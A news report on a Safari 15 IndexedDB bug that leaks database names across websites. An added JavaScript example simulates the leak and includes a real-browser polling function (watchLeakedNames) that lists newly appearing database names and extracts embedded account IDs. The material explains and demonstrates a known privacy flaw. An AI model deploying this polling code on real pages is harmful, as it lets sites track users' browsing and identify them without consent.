Researchers have found a vulnerability in Apple’s Safari 15 browser that allows websites to spy on a user’s browsing activity and, in some cases, learn other personal information. The anomalous behavior was identified by FingerprintJS, a browser fingerprinting service.
The problem lies in Apple’s implementation of IndexedDB, a browser API that websites can use to create databases in the browser, store data in them, and retrieve that data later. The same-origin policy is supposed to ensure that only the origin that created a database can access it.
However, when a webpage interacts with a database on Safari 15 on macOS, or in any browser on iOS or iPadOS, “a new (empty) database with the same name is created in all other active frames, tabs, and windows within the same browser session,” FingerprintJS explains. The name of a database created by one website therefore becomes visible to every other website open in the same session, even though its contents do not.
Leaked database names allow untrusted or malicious websites to “learn what websites the user visits in different tabs or windows.” That alone is a clear violation of the user’s privacy, but the impact of this Safari bug goes further.
In addition, the database names themselves may contain personal information such as a user ID. Google, for example, handles it this way, explains the fingerprinting service provider: when a user is signed in to a Google account on sites such as YouTube or Google Calendar, the unique internal user ID becomes part of the database name, which other websites can then retrieve through the security gap.
Because Google’s user ID can be used to query publicly visible profile information via an API, a website could find out the identity of the user, FingerprintJS explains. It could also link several different accounts belonging to the same user. Apart from Google, a number of other websites, including advertising networks, also name their databases with unique user IDs.
FingerprintJS has also published a proof of concept that demonstrates the bug; it can be tested on Safari 15 or later on Mac, iPhone and iPad.
The vulnerability was reported on November 28, 2021, in the bug tracker of WebKit, Safari’s browser engine. As of this writing, Apple has not released a fix.
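The following is an added example, not FingerprintJS’s proof of concept or any code from Apple or WebKit. It models the behavior described above, where opening a database in one frame creates an empty database of the same name in every other frame of the session, and shows the polling logic a detection page would run against the real `indexedDB.databases()` API (which returns a promise of `{name, version}` objects). The `LeakySession` class, the origins, and the database name `ExampleLogsDB:1234567890123456||` are constructed stand-ins so the file runs offline; the digit-run heuristic for spotting account IDs in names is an assumption, not something the report specifies.

```javascript
// Added example: cross-origin IndexedDB name leak, as a detector plus an offline simulation.

// --- Detection logic (works against anything with the IDBFactory.databases() shape) ---

// Names present now that were absent from the baseline snapshot. On a leaky
// browser, a name appearing on an origin that never created it reveals a
// database some other tab or frame created.
function diffNames(baselineNames, currentNames) {
  const seen = new Set(baselineNames);
  return currentNames.filter((n) => !seen.has(n));
}

// Heuristic (assumption): long digit runs in a database name are candidate account IDs.
function candidateIds(name) {
  return name.match(/\d{8,}/g) || [];
}

// Real-browser glue, not exercised offline: poll indexedDB.databases() and report
// newly appearing names. Usage: watchLeakedNames(indexedDB, console.log).
async function watchLeakedNames(idb, onLeak, intervalMs = 1000) {
  let baseline = (await idb.databases()).map((d) => d.name);
  return setInterval(async () => {
    const current = (await idb.databases()).map((d) => d.name);
    const fresh = diffNames(baseline, current);
    if (fresh.length) onLeak(fresh.map((n) => ({ name: n, ids: candidateIds(n) })));
    baseline = current;
  }, intervalMs);
}

// --- Simulation (constructed): one frame per origin in a single browser session ---

class LeakySession {
  // leaky=true reproduces the Safari 15 behavior; leaky=false is a correctly isolated browser.
  constructor(leaky) {
    this.leaky = leaky;
    this.frames = new Map(); // origin -> Map(dbName -> version)
  }
  frame(origin) {
    if (!this.frames.has(origin)) this.frames.set(origin, new Map());
    const own = this.frames.get(origin);
    return {
      // Synchronous stand-in for IDBFactory.open(name, version).
      open: (name, version = 1) => {
        own.set(name, version);
        if (!this.leaky) return;
        // The leak: every other frame gets an empty database with the same name.
        for (const [other, dbs] of this.frames) {
          if (other !== origin && !dbs.has(name)) dbs.set(name, 0);
        }
      },
      // Synchronous stand-in for IDBFactory.databases().
      databases: () => [...own].map(([name, version]) => ({ name, version })),
    };
  }
}

// Scenario: the attacker page snapshots its own databases, a victim page in another
// tab opens an account-scoped database, and the attacker polls again.
function runScenario(leaky) {
  const session = new LeakySession(leaky);
  const attacker = session.frame("https://attacker.example");
  const victim = session.frame("https://calendar.example");
  attacker.open("attacker-own-db"); // the attacker's legitimate database is excluded by the baseline
  const baseline = attacker.databases().map((d) => d.name);
  victim.open("ExampleLogsDB:1234567890123456||", 3); // constructed name embedding an account ID
  const current = attacker.databases();
  return diffNames(baseline, current.map((d) => d.name)).map((name) => ({
    name,
    version: current.find((d) => d.name === name).version, // 0: the copy is empty
    ids: candidateIds(name),
  }));
}
```

On the leaky session the attacker observes `ExampleLogsDB:1234567890123456||` (version 0, no contents) and extracts the embedded ID; on the isolated session the diff is empty. In a real page only `diffNames`, `candidateIds`, and `watchLeakedNames` are needed, with the browser’s own `indexedDB` passed in.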